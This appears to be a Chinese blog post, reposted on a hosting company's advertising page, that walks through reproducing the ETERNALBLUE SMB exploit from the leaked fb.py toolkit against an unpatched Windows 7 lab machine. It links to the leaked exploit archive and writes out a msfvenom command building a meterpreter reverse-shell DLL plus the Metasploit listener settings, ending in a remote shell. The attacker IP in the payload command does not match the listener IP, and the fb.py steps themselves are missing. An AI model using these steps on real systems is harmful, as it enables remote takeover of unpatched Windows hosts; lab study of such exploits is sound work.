方程式ETERNALBLUE 之fb.py的复现-创新互联
方程式ETERNALBLUE 之fb.py的复现
创新互联是一家集网站建设,眉县企业网站建设,眉县品牌网站建设,网站定制,眉县网站建设报价,网络营销,网络优化,眉县网站推广为一体的创新建站企业,帮助传统企业提升企业形象加强企业竞争力。可充分满足这一群体相比中小企业更为丰富、高端、多元的互联网需求。同时我们时刻保持专业、时尚、前沿,时刻以成就客户成长自我,坚持不断学习、思考、沉淀、净化自己,让我们为更多的企业打造出实用型网站。1.环境简介
***机win2003
ip:192.168.1.105
***机kali:
ip:192.168.1.106
靶机(被***机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100
2.windows2003***机
***机win2003安装环境:
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master
安装好python后,需要在win2003设置环境变量:
将整个ETERNALBLUE 目录下的 windows拷贝到***机win2003上
在windows目录下建立一个文件为:listeningposts
运行phthon fb.py
以下在***机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。
3***机kali上
利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll
将s.dll文件拷贝到windows2003的C盘目录下:
在msf下开启msfpaylod监听:
use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
4.接着在windows2003下执行
最后在msf下可以看到成功反弹shell:
另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。
文章题目:方程式ETERNALBLUE 之fb.py的复现-创新互联
文章转载:http://scyanting.com/article/dcgips.html